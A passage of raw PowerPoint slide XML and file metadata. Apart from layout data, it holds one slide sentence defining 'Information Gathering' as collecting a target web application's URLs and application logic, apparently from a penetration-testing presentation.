                      <a:pt x="98019" y="8194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113196" y="3451"/>
                      <a:pt x="130270" y="606"/>
                      <a:pt x="141652" y="606"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169160" y="-2240"/>
                      <a:pt x="179594" y="5349"/>
                      <a:pt x="204256" y="14834"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="243147" y="30959"/>
                      <a:pt x="279192" y="40445"/>
                      <a:pt x="316185" y="67953"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="357921" y="104946"/>
                      <a:pt x="384481" y="148579"/>
                      <a:pt x="394915" y="205492"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="397760" y="215926"/>
                      <a:pt x="402503" y="227309"/>
                      <a:pt x="402503" y="240588"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="367407" y="316472"/>
                      <a:pt x="325671" y="397099"/>
                      <a:pt x="290574" y="472983"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="282986" y="488159"/>
                      <a:pt x="276346" y="475828"/>
                      <a:pt x="269706" y="473931"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="257375" y="472983"/>
                      <a:pt x="246941" y="467291"/>
                      <a:pt x="236507" y="460651"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178646" y="425555"/>
                      <a:pt x="68614" y="334495"/>
                      <a:pt x="49643" y="318369"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDCE98"/>
              </a:solidFill>
              <a:ln w="9484" cap="flat">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF5BB1A-2BF8-DD56-D233-8E774CACFEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361434" y="2158287"/>
            <a:ext cx="6096000" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Information Gathering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>involves gaining accurate information about the target, such as web application URLs, description of application logic, and other critical functions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2867264765"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Cover and End Slide Master">
  <a:themeElements>
    <a:clrScheme name="ALLPPT-208">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208">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12901</TotalTime>
  <Words>4987</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>607</Paragraphs>
  <Slides>63</Slides>
  <Notes>41</Notes>
  <HiddenSlides>6</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63</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="74" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Montserrat ExtraBold</vt:lpstr>
      <vt:lpstr>roboto</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Cover and End Slide Master</vt:lpstr>
      <vt:lpstr>Custom Design</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Akmal Harith</cp:lastModifiedBy>
  <cp:revision>285</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-20T05:08:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-03T15:33:40Z</dcterms:modified>
</cp:coreProperties>
</file>